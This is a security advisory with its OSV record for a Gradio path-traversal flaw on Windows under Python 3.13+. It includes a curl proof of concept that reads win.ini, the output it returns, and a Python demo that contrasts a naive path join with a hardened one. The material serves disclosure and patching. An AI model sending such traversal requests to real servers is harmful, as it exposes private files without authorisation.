GHSA-39MP-8HJ3-5C49

Vulnerability from github – Published: 2026-03-01 01:28 – Updated: 2026-03-01 01:28
Summary
Gradio is Vulnerable to Absolute Path Traversal on Windows with Python 3.13+
Details

Summary

Gradio apps running on Windows with Python 3.13+ are vulnerable to an absolute path traversal issue that enables unauthenticated attackers to read arbitrary files from the server's file system.

Details

Python 3.13 changed the definition of os.path.isabs on Windows so that root-relative paths such as /windows/win.ini (a single leading slash, no drive letter) are no longer considered absolute. Gradio's logic for joining paths safely relied on that check, so such a path now passes the check and, once joined, escapes the intended directory.

This can be exploited by unauthenticated attackers to read arbitrary files on the host running Gradio, even when the app is configured with authentication.

PoC

% curl http://10.10.10.10:7860/static//windows/win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
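
The mechanism described in Details and exercised by the PoC above, as an added worked example that is not Gradio's code and is not taken from the advisory: a join guarded only by os.path.isabs beside a containment check that does not depend on the 3.13 change. STATIC_ROOT, STATIC_PREFIX, the sample request paths and the function names are assumptions made for the example; ntpath is used explicitly so the Windows path semantics are reproduced on any operating system and Python version.

```python
"""Constructed demonstration of the os.path.isabs change behind this advisory.

This is not Gradio's code: STATIC_ROOT, STATIC_PREFIX and the helper names are
assumptions made for the example. ntpath is used explicitly so the Windows
path semantics are reproduced on any operating system.
"""
import ntpath
import sys

# ntpath.isabs("/windows/win.ini") is True before 3.13 and False from 3.13 on.
PY313_PLUS = sys.version_info >= (3, 13)

STATIC_ROOT = r"C:\app\static"   # assumed directory the static route serves
STATIC_PREFIX = "/static/"       # assumed route prefix, as in the PoC URL


def user_path_from_request(request_path: str) -> str:
    """Strip the route prefix the way a static-file handler would.

    For the PoC URL path "/static//windows/win.ini" the remainder is
    "/windows/win.ini": a root-relative path (single leading slash, no drive).
    """
    if not request_path.startswith(STATIC_PREFIX):
        raise ValueError(f"not a static request: {request_path!r}")
    return request_path[len(STATIC_PREFIX):]


def naive_safe_join(root: str, user_path: str) -> str:
    """The weak pattern: block '..' segments and 'absolute' input, then join.

    Before 3.13 the isabs check rejects "/windows/win.ini". From 3.13 it does
    not, and ntpath.join treats a leading slash as 'back to the drive root',
    keeping only the drive letter of root: the result is C:\\windows\\win.ini.
    """
    segments = user_path.replace("/", "\\").split("\\")
    if ".." in segments or ntpath.isabs(user_path):
        raise PermissionError(f"rejected: {user_path!r}")
    return ntpath.normpath(ntpath.join(root, user_path))


def hardened_safe_join(root: str, user_path: str) -> str:
    """Containment check that does not depend on isabs semantics.

    Normalise the joined candidate and require that its common prefix with
    the root is the root itself. ntpath.commonpath raises ValueError when the
    paths are on different drives or one of them is a UNC path; that is a
    rejection as well.
    """
    root_n = ntpath.normpath(root)
    candidate = ntpath.normpath(ntpath.join(root_n, user_path))
    try:
        common = ntpath.commonpath([root_n, candidate])
    except ValueError:
        raise PermissionError(f"outside static root: {user_path!r}") from None
    if common != root_n:
        raise PermissionError(f"outside static root: {user_path!r}")
    return candidate


def try_join(joiner, user_path: str):
    """Return the path a joiner would serve, or None when it rejects the input."""
    try:
        return joiner(STATIC_ROOT, user_path)
    except PermissionError:
        return None


if __name__ == "__main__":
    requests = [
        "/static/css/app.css",          # legitimate file under the root
        "/static//windows/win.ini",     # the advisory's PoC
        "/static/..\\..\\secret.txt",   # classic dot-dot traversal
        "/static/D:\\other\\file",      # drive-absolute path
        "/static/\\\\srv\\share\\x",    # UNC path
    ]
    print(f"Python {sys.version.split()[0]}")
    for req in requests:
        p = user_path_from_request(req)
        print(f"{req:30} naive={try_join(naive_safe_join, p)!s:26} "
              f"hardened={try_join(hardened_safe_join, p)}")
```

Run under Python 3.12 the naive join rejects the PoC path; under 3.13 or later it returns C:\windows\win.ini, which is exactly the file the curl request above retrieves. The hardened join rejects it on every version because it checks where the joined result actually lands rather than what the input looks like, which is the property a safe-join helper should guarantee.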

Impact

Arbitrary file read with the privileges of the Windows account running the Gradio process.


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "gradio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28414"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-36"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-01T01:28:41Z",
    "nvd_published_at": "2026-02-27T22:16:24Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nGradio apps running on Window with Python 3.13+ are vulnerable to an absolute path traversal issue that enables unauthenticated attackers to read arbitrary files from the file system.\n\n### Details\nPython 3.13+ changed the definition of `os.path.isabs` so that root-relative paths like `/windows/win.ini` on Windows are no longer considered absolute paths, resulting in a vulnerability in Gradio\u0027s logic for joining paths safely.\n\nThis can be exploited by unauthenticated attackers to read arbitrary files from the Gradio server, even when Gradio is set up with authentication.\n\n### PoC\n```\n% curl http://10.10.10.10:7860/static//windows/win.ini\n; for 16-bit app support\n[fonts]\n[extensions]\n[mci extensions]\n[files]\n[Mail]\nMAPI=1\n```\n\n### Impact\nArbitrary file read in the context of the Windows user running Gradio.",
  "id": "GHSA-39mp-8hj3-5c49",
  "modified": "2026-03-01T01:28:41Z",
  "published": "2026-03-01T01:28:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-39mp-8hj3-5c49"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28414"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gradio-app/gradio/commit/6011b00d0154b85532fa901dd73cf8fa7d86fd04"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gradio-app/gradio"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gradio is Vulnerable to Absolute Path Traversal on Windows with Python 3.13+"
}

